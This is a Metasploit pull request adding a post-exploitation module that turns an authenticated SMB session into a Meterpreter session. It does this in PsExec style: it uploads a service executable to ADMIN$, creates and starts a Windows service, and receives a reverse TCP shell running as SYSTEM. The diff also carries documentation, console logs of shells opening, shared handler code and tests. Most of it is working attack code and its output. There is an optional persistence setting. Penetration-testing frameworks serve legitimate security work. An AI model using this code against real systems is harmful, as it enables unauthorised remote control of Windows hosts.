### PR TITLE
Smb meterpreter upgrade

### DIFF
--- a/documentation/modules/post/windows/manage/smb_to_meterpreter.md
+++ b/documentation/modules/post/windows/manage/smb_to_meterpreter.md
@@ -28,7 +28,7 @@ cleaned up automatically unless `SERVICE_PERSIST` is set.
 1. Do: `set SESSION <smb_session_id>`
 1. Do: `set LHOST <your_listener_ip>`
 1. Do: `run`
-1. You should get a Meterpreter session on the target.
+1. You should get a Meterpreter session on the target running in the context of NT AUTHORITY\SYSTEM.
 
 Alternatively, you can upgrade directly from the sessions command:
 

--- a/documentation/modules/post/windows/manage/smb_to_meterpreter.md
+++ b/documentation/modules/post/windows/manage/smb_to_meterpreter.md
@@ -77,3 +77,65 @@ How long (in seconds) to wait for the Meterpreter session to connect back before
 reporting a timeout failure. (Default: `30`)
 
 ## Scenarios
+
+### sessions -u <smb_session_id>
+
+```msf
+msf auxiliary(scanner/smb/smb_login) > sessions -u -1
+[*] Executing 'post/windows/manage/smb_to_meterpreter' on session: [-1]
+[!] SESSION may not be compatible with this module:
+[!]  * Unknown session arch
+[!]  * Unknown session platform. This module works with: Windows.
+[*] Starting exploit/multi/handler on 10.15.200.61:4444
+[*] Started reverse TCP handler on 10.15.200.61:4444
+[*] Uploaded payload to \\172.16.158.182\ADMIN$\unFxBvVr.exe
+[*] Bound to \svcctl
+[*] Creating service BkAPktWzvIFv...
+[*] Starting the service...
+[*] Sending stage (248902 bytes) to 10.15.200.61
+[+] Service started successfully
+[!] Could not stop service 'BkAPktWzvIFv': Error returned when sending a control to the service: (0x00000426) ERROR_SERVICE_NOT_ACTIVE: The service has not been started.
+[+] Service 'BkAPktWzvIFv' deleted successfully
+[+] Deleted \\172.16.158.182\ADMIN$\unFxBvVr.exe
+[*] Waiting up to 30 seconds for Meterpreter session...
+[+] Meterpreter session opened successfully!
+msf auxiliary(scanner/smb/smb_login) > [*] Meterpreter session 2 opened (10.15.200.61:4444 -> 10.15.200.61:64160) at 2026-06-18 13:13:07 +0100
+
+msf auxiliary(scanner/smb/smb_login) > sessions -1
+[*] Starting interaction with 2...
+
+meterpreter > pwd
+C:\Windows\system32
+meterpreter >
+```
+
+### smb_to_meterpreter
+
+```msf
+msf post(windows/manage/smb_to_meterpreter) > run
+[!] SESSION may not be compatible with this module:
+[!]  * Unknown session arch
+[!]  * Unknown session platform. This module works with: Windows.
+[*] Starting exploit/multi/handler on 172.16.158.1:4444
+[*] Started reverse TCP handler on 172.16.158.1:4444
+[*] Uploaded payload to \\172.16.158.182\ADMIN$\kPjRNEHs.exe
+[*] Bound to \svcctl
+[*] Creating service gfAiBDOkmQDe...
+[*] Starting the service...
+[*] Sending stage (248902 bytes) to 172.16.158.182
+[+] Service started successfully
+[!] Could not stop service 'gfAiBDOkmQDe': Error returned when sending a control to the service: (0x00000426) ERROR_SERVICE_NOT_ACTIVE: The service has not been started.
+[+] Service 'gfAiBDOkmQDe' deleted successfully
+[+] Deleted \\172.16.158.182\ADMIN$\kPjRNEHs.exe
+[*] Waiting up to 30 seconds for Meterpreter session...
+[+] Meterpreter session opened successfully!
+[*] Post module execution completed
+msf post(windows/manage/smb_to_meterpreter) > [*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.182:49309) at 2026-06-18 13:15:39 +0100
+
+msf post(windows/manage/smb_to_meterpreter) > sessions -1
+[*] Starting interaction with 3...
+
+meterpreter > pwd
+C:\Windows\system32
+meterpreter >
+```

--- a/documentation/modules/post/windows/manage/smb_to_meterpreter.md
+++ b/documentation/modules/post/windows/manage/smb_to_meterpreter.md
@@ -1,0 +1,79 @@
+## Vulnerable Application
+
+This module upgrades an authenticated SMB session to a Meterpreter session using
+PsExec techniques. It leverages the existing authenticated SMB connection to create
+and start a Windows service on the target that executes a Meterpreter payload.
+
+### Prerequisites
+
+1. An authenticated SMB session (`Msf::Sessions::SMB`) obtained via modules such as
+   `auxiliary/scanner/smb/smb_login` or relay attacks with the `SMB_SESSION_TYPE`
+   feature flag enabled.
+2. The authenticated user must have administrative privileges on the target system,
+   as the module requires access to the Windows Service Control Manager (SVCCTL).
+3. The target must be a Windows system reachable over SMB (port 445).
+
+### How It Works
+
+The module connects to the `IPC$` share using the existing session credentials, binds
+to the SVCCTL named pipe, creates a Windows service configured to execute a Meterpreter
+reverse TCP payload, and starts the service. Once the payload executes, the service is
+cleaned up automatically unless `SERVICE_PERSIST` is set.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Obtain an authenticated SMB session (e.g. via `auxiliary/scanner/smb/smb_login` with `CreateSession` set to `true`)
+1. Do: `use post/windows/manage/smb_to_meterpreter`
+1. Do: `set SESSION <smb_session_id>`
+1. Do: `set LHOST <your_listener_ip>`
+1. Do: `run`
+1. You should get a Meterpreter session on the target.
+
+Alternatively, you can upgrade directly from the sessions command:
+
+1. Do: `sessions -u <smb_session_id>`
+1. The framework routes the SMB session to this module automatically.
+
+## Options
+
+### HANDLER
+
+When set to `true`, the module automatically starts an `exploit/multi/handler` to
+receive the incoming Meterpreter connection. Set to `false` if you have a handler
+running separately. (Default: `true`)
+
+### TARGET_ARCH
+
+The target architecture. Determines which Meterpreter payload variant is used.
+Accepted values: `x86`, `x64`. (Default: `x64`)
+
+When no explicit payload is specified, the module selects a Meterpreter reverse TCP
+payload based on this option:
+
+- `x64`: `windows/x64/meterpreter/reverse_tcp`
+- `x86`: `windows/meterpreter/reverse_tcp`
+
+### Advanced Options
+
+#### PAYLOAD_OVERRIDE
+
+Define the payload to use instead of the auto-selected `meterpreter/reverse_tcp`
+variant. When not set, the module picks based on `TARGET_ARCH`.
+
+#### SERVICE_NAME
+
+A custom name for the Windows service created on the target. If not set, a random
+alphanumeric name between 8 and 16 characters is generated.
+
+#### SERVICE_PERSIST
+
+When set to `true`, the module skips service deletion after execution, leaving the
+service on the target. Useful for debugging or persistence scenarios. (Default: `false`)
+
+#### HANDLE_TIMEOUT
+
+How long (in seconds) to wait for the Meterpreter session to connect back before
+reporting a timeout failure. (Default: `30`)
+
+## Scenarios

--- a/lib/msf/core/exploit/retry.rb
+++ b/lib/msf/core/exploit/retry.rb
@@ -30,4 +30,29 @@ module Msf::Exploit::Retry
 
     nil
   end
+
+  # Poll the block at a fixed interval until it returns a truthy value or the
+  # timeout expires. Unlike retry_until_truthy, this uses a consistent delay
+  # between attempts rather than exponential backoff — useful when checking for
+  # a state change that could happen at any moment (e.g. waiting for a session).
+  #
+  # @param timeout [Integer] maximum seconds to wait
+  # @param interval [Numeric] seconds between each poll (default: 1)
+  # @return the truthy value of the block, or nil if timed out
+  def poll_until_truthy(timeout:, interval: 1)
+    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+    ending_time = start_time + timeout
+
+    loop do
+      result = yield
+      return result if result
+
+      remaining = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+      break if remaining <= 0
+
+      sleep [interval, remaining].min
+    end
+
+    nil
+  end
 end

--- a/lib/msf/core/post/session_upgrade.rb
+++ b/lib/msf/core/post/session_upgrade.rb
@@ -11,6 +11,7 @@
 # polling. Consuming modules implement `execute_upgrade` for delivery.
 #
 module Msf::Post::SessionUpgrade
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Retry
 
   def initialize(info = {})
@@ -81,7 +82,7 @@ module Msf::Post::SessionUpgrade
   private
 
   # Resolves the listener address using a three-source fallback:
-  # module datastore → framework datastore → session tunnel_local.
+  # module datastore > framework datastore > session tunnel_local.
   def resolve_lhost
     if datastore['LHOST'].present?
       return datastore['LHOST']
@@ -172,7 +173,7 @@ module Msf::Post::SessionUpgrade
       print_good('Meterpreter session opened successfully!')
       true
     else
-      print_error("No session received within #{timeout} seconds.")
+      print_error("No session received within #{timeout} seconds. Increase HANDLE_TIMEOUT to wait longer")
       false
     end
   end

--- a/lib/msf/core/post/session_upgrade.rb
+++ b/lib/msf/core/post/session_upgrade.rb
@@ -1,0 +1,189 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+#
+# Shared orchestration logic for session upgrade modules. Provides LHOST
+# resolution, handler lifecycle, payload generation, and wait-for-session
+# polling. Consuming modules implement `execute_upgrade` for delivery.
+#
+module Msf::Post::SessionUpgrade
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        Msf::OptAddressLocal.new('LHOST', [false, 'IP of host that will receive the connection from the payload.']),
+        Msf::OptInt.new('LPORT', [true, 'Port for payload to connect to.', 4444]),
+        Msf::OptBool.new('HANDLER', [true, 'Start an exploit/multi/handler to receive the connection.', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        Msf::OptInt.new('HANDLE_TIMEOUT', [true, 'How long to wait (in seconds) for the session to come back.', 30])
+      ]
+    )
+  end
+
+  # Orchestration entry point. Consuming modules call this from `run`.
+  def run_upgrade
+    lhost = resolve_lhost
+    if lhost.nil?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Unable to determine LHOST. Please set LHOST manually.')
+    end
+
+    existing_session_ids = framework.sessions.keys.map(&:to_i).to_set
+
+    start_upgrade_handler(lhost) if datastore['HANDLER']
+
+    execute_upgrade(lhost)
+
+    if datastore['HANDLER']
+      wait_for_upgrade_session(existing_session_ids)
+    end
+  ensure
+    cleanup_upgrade_handler
+  end
+
+  # Contract method — consuming modules must override this to deliver the
+  # payload to the target. Raises NotImplementedError if not implemented.
+  def execute_upgrade(lhost)
+    raise NotImplementedError, 'Consuming modules must implement execute_upgrade(lhost)'
+  end
+
+  # Generates raw stager bytes via the framework payload API.
+  #
+  # @param lhost [String] the listen host for the payload
+  # @param lport [Integer, String] the listen port for the payload
+  # @param payload_name [String] framework payload name (e.g. 'windows/meterpreter/reverse_tcp')
+  # @return [String, nil] raw payload bytes on success, nil on failure
+  def generate_upgrade_payload(lhost, lport, payload_name)
+    payload_obj = framework.payloads.create(payload_name)
+    unless payload_obj
+      print_error("Invalid payload: #{payload_name}")
+      return nil
+    end
+
+    unless payload_obj.respond_to?(:generate_simple)
+      print_error("Payload #{payload_name} does not support generate_simple")
+      return nil
+    end
+
+    payload_obj.generate_simple('OptionStr' => "LHOST=#{lhost} LPORT=#{lport}")
+  end
+
+  private
+
+  # Resolves the listener address using a three-source fallback:
+  # module datastore → framework datastore → session tunnel_local.
+  def resolve_lhost
+    if datastore['LHOST'].present?
+      return datastore['LHOST']
+    end
+
+    if framework.datastore['LHOST'].present?
+      return framework.datastore['LHOST']
+    end
+
+    tunnel = session.tunnel_local
+    if tunnel.present?
+      if tunnel.include?('Local Pipe')
+        print_error('Cannot determine LHOST from session. Please set LHOST manually.')
+        return nil
+      end
+
+      host = tunnel.split(':').first
+      if host.blank?
+        print_error('Cannot determine LHOST from session. Please set LHOST manually.')
+        return nil
+      end
+
+      return host
+    end
+
+    print_error('Unable to determine LHOST. Please set LHOST manually.')
+    nil
+  end
+
+  # Checks whether a multi/handler is already listening on the given address and port.
+  def check_for_listener(lhost, lport)
+    framework.jobs.each_value do |j|
+      next unless j.name =~ %r{multi/handler}
+
+      job_lhost = j.ctx[0].datastore['LHOST']
+      job_lport = j.ctx[0].datastore['LPORT']
+      if lhost == job_lhost && lport == job_lport.to_i
+        return true
+      end
+    end
+    false
+  end
+
+  # Starts an exploit/multi/handler as a background job to receive the upgraded session.
+  def start_upgrade_handler(lhost)
+    payload_name = datastore['PAYLOAD']
+    lport = datastore['LPORT']
+
+    if check_for_listener(lhost, lport)
+      fail_with(Msf::Exploit::Failure::BadConfig, "Port #{lport} is already in use by another handler.")
+    end
+
+    print_status("Starting exploit/multi/handler on #{lhost}:#{lport}")
+
+    handler_mod = framework.exploits.create('multi/handler')
+    handler_mod.datastore['PAYLOAD'] = payload_name
+    handler_mod.datastore['LHOST'] = lhost
+    handler_mod.datastore['LPORT'] = lport
+    handler_mod.datastore['ExitOnSession'] = true
+
+    handler_mod.exploit_simple(
+      'Payload' => payload_name,
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => true
+    )
+
+    # Allow handler time to bind; if it fails, the job disappears
+    Rex::ThreadSafe.sleep(2)
+    if framework.jobs[handler_mod.job_id.to_s].nil?
+      fail_with(Msf::Exploit::Failure::Unknown, "Handler failed to start on port #{lport}. Port may be in use.")
+    end
+
+    @upgrade_handler_job_id = handler_mod.job_id.to_s
+  end
+
+  # Polls framework.sessions for a new session ID not in the existing set.
+  # Returns true if a new session appears before HANDLE_TIMEOUT, false otherwise.
+  def wait_for_upgrade_session(existing_session_ids)
+    timeout = datastore['HANDLE_TIMEOUT']
+    print_status("Waiting up to #{timeout} seconds for Meterpreter session...")
+
+    timer = 0
+    while timer < timeout
+      new_ids = framework.sessions.keys.map(&:to_i).to_set - existing_session_ids
+      unless new_ids.empty?
+        print_good('Meterpreter session opened successfully!')
+        return true
+      end
+      Rex::ThreadSafe.sleep(1)
+      timer += 1
+    end
+
+    print_error("No session received within #{timeout} seconds.")
+    false
+  end
+
+  # Stops the background handler job and clears the tracking state.
+  def cleanup_upgrade_handler
+    return unless @upgrade_handler_job_id
+
+    if framework.jobs[@upgrade_handler_job_id]
+      framework.jobs.stop_job(@upgrade_handler_job_id)
+    end
+    @upgrade_handler_job_id = nil
+  end
+end

--- a/lib/msf/core/post/session_upgrade.rb
+++ b/lib/msf/core/post/session_upgrade.rb
@@ -11,6 +11,8 @@
 # polling. Consuming modules implement `execute_upgrade` for delivery.
 #
 module Msf::Post::SessionUpgrade
+  include Msf::Exploit::Retry
+
   def initialize(info = {})
     super
 
@@ -157,24 +159,22 @@ module Msf::Post::SessionUpgrade
   end
 
   # Polls framework.sessions for a new session ID not in the existing set.
-  # Returns true if a new session appears before HANDLE_TIMEOUT, false otherwise.
   def wait_for_upgrade_session(existing_session_ids)
     timeout = datastore['HANDLE_TIMEOUT']
     print_status("Waiting up to #{timeout} seconds for Meterpreter session...")
 
-    timer = 0
-    while timer < timeout
+    new_session = poll_until_truthy(timeout: timeout) do
       new_ids = framework.sessions.keys.map(&:to_i).to_set - existing_session_ids
-      unless new_ids.empty?
-        print_good('Meterpreter session opened successfully!')
-        return true
-      end
-      Rex::ThreadSafe.sleep(1)
-      timer += 1
+      new_ids.first unless new_ids.empty?
     end
 
-    print_error("No session received within #{timeout} seconds.")
-    false
+    if new_session
+      print_good('Meterpreter session opened successfully!')
+      true
+    else
+      print_error("No session received within #{timeout} seconds.")
+      false
+    end
   end
 
   # Stops the background handler job and clears the tracking state.

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1815,11 +1815,33 @@ class Core
         end
       end
     when 'upexec'
-      print_status("Executing 'post/multi/manage/shell_to_meterpreter' on " +
-                    "session(s): #{session_list}")
       session_list.each do |sess_id|
         session = verify_session(sess_id)
-        if session
+        next unless session
+
+        if session.type == 'smb'
+          # Route SMB sessions to the dedicated upgrade module
+          mod = framework.modules.create('post/windows/manage/smb_to_meterpreter')
+          unless mod
+            print_error('Failed to create post/windows/manage/smb_to_meterpreter module.')
+            next
+          end
+
+          print_status("Executing 'post/windows/manage/smb_to_meterpreter' on session: [#{sess_id}]")
+          opts = { 'SESSION' => sess_id.to_s }
+          if session.exploit_datastore
+            %w[LHOST LPORT TARGET_ARCH].each do |key|
+              opts[key] = session.exploit_datastore[key] if session.exploit_datastore[key]
+            end
+          end
+          mod.run_simple(
+            'LocalInput' => driver.input,
+            'LocalOutput' => driver.output,
+            'Options' => opts
+          )
+        else
+          print_status("Executing 'post/multi/manage/shell_to_meterpreter' on " \
+                        "session: [#{sess_id}]")
           if session.respond_to?(:response_timeout)
             last_known_timeout = session.response_timeout
             session.response_timeout = response_timeout

--- a/modules/post/windows/manage/smb_to_meterpreter.rb
+++ b/modules/post/windows/manage/smb_to_meterpreter.rb
@@ -1,0 +1,311 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Exploit::EXE
+  include Msf::Auxiliary::Report
+  include Msf::Post::SessionUpgrade
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SMB to Meterpreter Upgrade via PsExec',
+        'Description' => %q{
+          Upgrades an authenticated SMB session to a Meterpreter session using PsExec techniques.
+          This module uploads a service-wrapped executable payload to the ADMIN$ share via the
+          existing authenticated SMB connection, then creates and starts a Windows service that
+          executes the payload. This mirrors the approach used by exploit/windows/smb/psexec.
+          Requires administrative privileges on the target.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Dean Welch'],
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'SessionTypes' => ['smb'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptEnum.new('TARGET_ARCH', [true, 'Target architecture.', 'x64', ['x86', 'x64']])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('PAYLOAD_OVERRIDE', [false, 'Define the payload to use instead of the auto-selected meterpreter payload.']),
+        OptString.new('SERVICE_NAME', [false, 'Custom service name (random if not set).']),
+        OptString.new('SERVICE_DISPLAY_NAME', [false, 'Custom service display name.']),
+        OptBool.new('SERVICE_PERSIST', [false, 'Do not delete the service after execution.', false]),
+        OptString.new('SERVICE_FILENAME', [false, 'Filename for the uploaded payload (random if not set).'])
+      ]
+    )
+  end
+
+  def run
+    return unless validate_session!
+
+    datastore['PAYLOAD'] = datastore['PAYLOAD_OVERRIDE'].presence || select_payload
+    run_upgrade
+  end
+
+  # Verifies the session can access ADMIN$ and bind to the SVCCTL pipe.
+  def check
+    return Exploit::CheckCode::Safe('Session is not valid') unless validate_session!
+
+    target_host = session.client.dispatcher.tcp_socket.peerhost
+    simple = session.simple_client
+
+    # Verify ADMIN$ is writable
+    share = admin_share_path(target_host)
+    begin
+      simple.connect(share)
+      simple.disconnect(share)
+    rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error => e
+      return Exploit::CheckCode::Safe("Cannot access ADMIN$ share: #{e}")
+    end
+
+    # Verify SVCCTL pipe is accessible
+    begin
+      tree = session.client.tree_connect("\\\\#{target_host}\\IPC$")
+      svcctl = tree.open_file(filename: 'svcctl', write: true, read: true)
+      svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)
+      scm_handle = svcctl.open_sc_manager_w(target_host)
+      svcctl.close_service_handle(scm_handle)
+      Exploit::CheckCode::Appears('ADMIN$ is writable and SVCCTL pipe is accessible')
+    rescue RubySMB::Dcerpc::Error::SvcctlError => e
+      if e.message.include?('ERROR_ACCESS_DENIED')
+        Exploit::CheckCode::Safe('Insufficient privileges to open Service Control Manager')
+      else
+        Exploit::CheckCode::Unknown("SVCCTL error: #{e}")
+      end
+    rescue RubySMB::Dcerpc::Error::BindError,
+           RubySMB::Dcerpc::Error::FaultError,
+           RubySMB::Dcerpc::Error::DcerpcError,
+           RubySMB::Error::RubySMBError => e
+      Exploit::CheckCode::Unknown("Cannot bind to SVCCTL pipe: #{e}")
+    ensure
+      tree.disconnect! if tree
+    end
+  end
+
+  # Uploads a service EXE to ADMIN$ and creates a Windows service to execute it.
+  def execute_upgrade(lhost)
+    target_host = session.client.dispatcher.tcp_socket.peerhost
+    simple = session.simple_client
+    @service_filename = datastore['SERVICE_FILENAME'] || "#{Rex::Text.rand_text_alpha(8)}.exe"
+    @target_host = target_host
+    @simple = simple
+
+    upload_payload_exe(simple, target_host, lhost)
+    execute_service_via_svcctl(target_host)
+  end
+
+  private
+
+  # Generates the service-wrapped EXE and writes it to \\target\ADMIN$\<filename>.
+  def upload_payload_exe(simple, target_host, lhost)
+    payload_data = generate_upgrade_payload(lhost, datastore['LPORT'], datastore['PAYLOAD'])
+    if payload_data.nil?
+      fail_with(Msf::Exploit::Failure::BadConfig, "Failed to generate payload #{datastore['PAYLOAD']}")
+    end
+
+    arch = datastore['TARGET_ARCH'] == 'x64' ? [ARCH_X64] : [ARCH_X86]
+    opts = { code: payload_data, arch: arch, servicename: service_name }
+    exe = Msf::Util::EXE.to_executable_fmt(framework, arch.first, 'win', payload_data, 'exe-service', opts)
+
+    if exe.nil? || exe.empty?
+      fail_with(Msf::Exploit::Failure::Unknown, 'Failed to generate service EXE payload')
+    end
+
+    share = admin_share_path(target_host)
+    begin
+      simple.connect(share)
+    rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error => e
+      fail_with(Msf::Exploit::Failure::Unreachable, "Failed to connect to ADMIN$ share: #{e}")
+    end
+
+    begin
+      fd = simple.open("\\#{@service_filename}", 'rwct', 48000, read: true, write: true)
+      fd << exe
+      fd.close
+      print_status("Uploaded payload to #{share}\\#{@service_filename}")
+    rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error => e
+      fail_with(Msf::Exploit::Failure::Unknown, "Failed to upload payload: #{e}")
+    ensure
+      simple.disconnect(share)
+    end
+  end
+
+  # Connects to IPC$ via SVCCTL, creates a service pointing at the uploaded EXE, and starts it.
+  def execute_service_via_svcctl(target_host)
+    svc_handle = nil
+    svcctl = nil
+    scm_handle = nil
+
+    begin
+      tree = session.client.tree_connect("\\\\#{target_host}\\IPC$")
+    rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error => e
+      print_error("Failed to connect to IPC$ share: #{e}")
+      return
+    end
+
+    begin
+      svcctl = tree.open_file(filename: 'svcctl', write: true, read: true)
+      svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)
+      vprint_status('Bound to \\svcctl')
+    rescue RubySMB::Dcerpc::Error::BindError,
+           RubySMB::Dcerpc::Error::FaultError,
+           RubySMB::Dcerpc::Error::DcerpcError,
+           RubySMB::Error::RubySMBError => e
+      print_error("Failed to bind to SVCCTL pipe: #{e}")
+      return
+    end
+
+    begin
+      scm_handle = svcctl.open_sc_manager_w(target_host)
+    rescue RubySMB::Dcerpc::Error::SvcctlError => e
+      if e.message.include?('ERROR_ACCESS_DENIED')
+        print_error('Insufficient privileges to open Service Control Manager. Administrative access is required.')
+      else
+        print_error("Failed to open Service Control Manager: #{e}")
+      end
+      return
+    end
+
+    display_name = datastore['SERVICE_DISPLAY_NAME'] || Rex::Text.rand_text_alpha(rand(8..16))
+    # Service binary path points to the uploaded EXE in %SYSTEMROOT%
+    bin_path = "%SYSTEMROOT%\\#{@service_filename}"
+
+    begin
+      vprint_status("Creating service #{service_name}...")
+      svc_handle = svcctl.create_service_w(scm_handle, service_name, display_name, bin_path)
+    rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Dcerpc::Error::FaultError => e
+      print_error("Failed to create service: #{e}")
+      return
+    end
+
+    begin
+      vprint_status('Starting the service...')
+      svcctl.start_service_w(svc_handle)
+      print_good('Service started successfully')
+    rescue RubySMB::Dcerpc::Error::SvcctlError => e
+      # Timeout is expected — the service EXE spawns the payload then exits
+      if e.message.include?('ERROR_SERVICE_REQUEST_TIMEOUT')
+        vprint_status('Service start timed out, expected for payload execution')
+      else
+        print_error("Failed to start service: #{e}")
+      end
+    end
+  ensure
+    cleanup_service(svcctl, svc_handle, service_name) if svc_handle && svcctl
+    begin
+      svcctl&.close_service_handle(scm_handle) if scm_handle
+    rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError
+      nil
+    end
+    cleanup_payload_file
+  end
+
+  # Removes the uploaded EXE from ADMIN$ unless SERVICE_PERSIST is set.
+  def cleanup_payload_file
+    return if datastore['SERVICE_PERSIST']
+    return if @service_filename.nil? || @simple.nil? || @target_host.nil?
+
+    share = admin_share_path(@target_host)
+    begin
+      @simple.connect(share)
+      @simple.delete("\\#{@service_filename}")
+      vprint_good("Deleted #{share}\\#{@service_filename}")
+    rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error => e
+      print_warning("Could not delete #{@service_filename} from ADMIN$. Manual removal may be required: #{e}")
+    ensure
+      begin
+        @simple.disconnect(share)
+      rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error
+        nil
+      end
+    end
+  end
+
+  # Returns the service name, generating a random one if not configured.
+  def service_name
+    @service_name ||= datastore['SERVICE_NAME'].presence || Rex::Text.rand_text_alpha(rand(8..16))
+  end
+
+  # Returns the UNC path to the ADMIN$ share on the target.
+  def admin_share_path(host)
+    "\\\\#{host}\\ADMIN$"
+  end
+
+  # Selects the appropriate Meterpreter payload based on target architecture.
+  def select_payload
+    case datastore['TARGET_ARCH']
+    when 'x64'
+      'windows/x64/meterpreter/reverse_tcp'
+    when 'x86'
+      'windows/meterpreter/reverse_tcp'
+    end
+  end
+
+  # Stops and deletes a Windows service created during execution.
+  def cleanup_service(svcctl, svc_handle, svc_name)
+    return if svcctl.nil? || svc_handle.nil?
+
+    if datastore['SERVICE_PERSIST']
+      vprint_status("SERVICE_PERSIST is set, skipping service deletion for '#{svc_name}'")
+      begin
+        svcctl.close_service_handle(svc_handle)
+      rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError => e
+        vprint_warning("Could not close service handle: #{e}")
+      end
+      return
+    end
+
+    begin
+      svcctl.control_service(svc_handle, RubySMB::Dcerpc::Svcctl::SERVICE_CONTROL_STOP)
+    rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError => e
+      vprint_warning("Could not stop service '#{svc_name}': #{e}")
+    end
+
+    begin
+      svcctl.delete_service(svc_handle)
+      vprint_good("Service '#{svc_name}' deleted successfully")
+    rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError => e
+      print_warning("Could not delete service '#{svc_name}'. Manual removal may be required: #{e}")
+    end
+
+    begin
+      svcctl.close_service_handle(svc_handle)
+    rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError => e
+      vprint_warning("Could not close service handle: #{e}")
+    end
+  end
+
+  # Returns true if session is valid, false otherwise.
+  def validate_session!
+    begin
+      session.client.dispatcher.tcp_socket.peerinfo
+    rescue Errno::ENOTCONN, IOError, Rex::ConnectionError => e
+      print_error("Session is not usable: #{e.message}")
+      return false
+    end
+
+    unless session.type == 'smb'
+      print_error("Invalid session type: #{session.type}. This module requires an SMB session.")
+      return false
+    end
+
+    true
+  end
+end

--- a/modules/post/windows/manage/smb_to_meterpreter.rb
+++ b/modules/post/windows/manage/smb_to_meterpreter.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Post
     begin
       svcctl&.close_service_handle(scm_handle) if scm_handle
     rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError
-      nil
+      vprint_warning("Could not close scm handle: #{e}")
     end
     cleanup_payload_file
   end

--- a/spec/lib/msf/core/exploit/retry_spec.rb
+++ b/spec/lib/msf/core/exploit/retry_spec.rb
@@ -129,4 +129,126 @@ RSpec.describe Msf::Exploit::Retry do
       end
     end
   end
+
+  describe '#poll_until_truthy' do
+    subject do
+      create_exploit
+    end
+
+    let(:mock_clock) do
+      clazz = Class.new do
+        def initialize
+          @current_time = 0
+        end
+
+        def now
+          @current_time
+        end
+
+        def time_travel(new_time)
+          @current_time = new_time
+        end
+      end
+
+      clazz.new
+    end
+
+    def increment_time_by(seconds)
+      mock_clock.time_travel(mock_clock.now + seconds)
+    end
+
+    before(:each) do
+      allow(Process).to receive(:clock_gettime).with(Process::CLOCK_MONOTONIC, :second) { |*_args| mock_clock.now }
+      allow(subject).to receive(:sleep) { |seconds| increment_time_by(seconds) }
+    end
+
+    context 'when the timeout is negative' do
+      it 'yields once then returns nil' do
+        call_count = 0
+        result = subject.poll_until_truthy(timeout: -1) do
+          call_count += 1
+          nil
+        end
+        expect(call_count).to eq(1)
+        expect(result).to be_nil
+      end
+    end
+
+    context 'when the timeout is 0' do
+      it 'yields once then returns nil' do
+        call_count = 0
+        result = subject.poll_until_truthy(timeout: 0) do
+          call_count += 1
+          nil
+        end
+        expect(call_count).to eq(1)
+        expect(result).to be_nil
+      end
+    end
+
+    context 'when the timeout is 5 with default interval' do
+      let(:timeout) { 5 }
+
+      it 'polls at 1-second intervals until timeout' do
+        call_count = 0
+        result = subject.poll_until_truthy(timeout: timeout) do
+          call_count += 1
+          nil
+        end
+        expect(call_count).to eq(6)
+        expect(result).to be_nil
+        expect(subject).to have_received(:sleep).with(1).exactly(5).times
+      end
+
+      it 'returns the truthy value immediately if first attempt succeeds' do
+        result = subject.poll_until_truthy(timeout: timeout) { :success }
+        expect(result).to eq(:success)
+        expect(subject).not_to have_received(:sleep)
+      end
+
+      it 'returns the truthy value on a subsequent attempt' do
+        call_count = 0
+        result = subject.poll_until_truthy(timeout: timeout) do
+          call_count += 1
+          call_count >= 3 ? :found : nil
+        end
+        expect(result).to eq(:found)
+        expect(call_count).to eq(3)
+        expect(subject).to have_received(:sleep).with(1).exactly(2).times
+      end
+
+      it 'raises unhandled exceptions' do
+        error = StandardError.new('boom')
+        expect {
+          subject.poll_until_truthy(timeout: timeout) { raise error }
+        }.to raise_error(error)
+        expect(subject).not_to have_received(:sleep)
+      end
+    end
+
+    context 'when a custom interval is specified' do
+      it 'uses the specified interval between polls' do
+        call_count = 0
+        subject.poll_until_truthy(timeout: 10, interval: 2) do
+          call_count += 1
+          nil
+        end
+        expect(call_count).to eq(6)
+        expect(subject).to have_received(:sleep).with(2).exactly(5).times
+      end
+    end
+
+    context 'when remaining time is less than the interval' do
+      it 'sleeps only for the remaining time' do
+        call_count = 0
+        subject.poll_until_truthy(timeout: 3, interval: 2) do
+          call_count += 1
+          nil
+        end
